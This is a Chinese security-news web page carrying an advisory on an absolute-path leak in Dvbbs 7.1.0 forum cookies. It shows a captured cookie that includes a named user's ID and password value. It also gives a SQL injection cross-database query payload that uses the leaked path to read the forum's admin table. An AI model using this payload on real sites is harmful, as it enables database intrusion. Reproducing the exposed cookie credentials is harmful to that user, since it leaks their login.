首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 漏洞利用

动网7.1.0存在泄露绝对路径漏洞


http://www.gipsky.com/
信息来源:小D的blog

厂商名字:动网先锋论坛

厂商地址:http://www.dvbbs.net/

漏洞程序:Dvbbs 7.1.0

漏洞描述:Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等。

漏洞利用例子:

一、泄露绝对漏洞测试:

对官方的测试站点:bbs.dvbbs.net

上传一张图,代码如下:

GIF89a



抓包得到cookie如下

Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7.1.0=UserID=617054&usercookies=1&userclass=???????&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs=

分析cookie可以得到站点的绝对路径如下:

d://web//dvbbs7为论坛的绝对路径

二、攻击延伸:

www.host.com

主程序存在sql注入漏洞,但是找不到表名和字段名。

注入点假设:

www.host.com//linzi.asp?# #=you

论坛为dvbbs 7.1.0 ,数据库为data////dvbbs.asp,做了防下载处理.

利用上面的动网暴路径,抓包得到绝对路径为 d://www//dvbbs//data//dvbbs.asp

实现跨库查询如下:

www.host.com//linzi.asp?# #=you and (select count(*) from dv_admin in "d://www//dvbbs//data//dvbbs.asp")

官方补丁:

尚无
Tags: dvbbs , 动网[/code]
[/code]
<< @live.com @live.cn注册漏洞[新] PHPWind >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号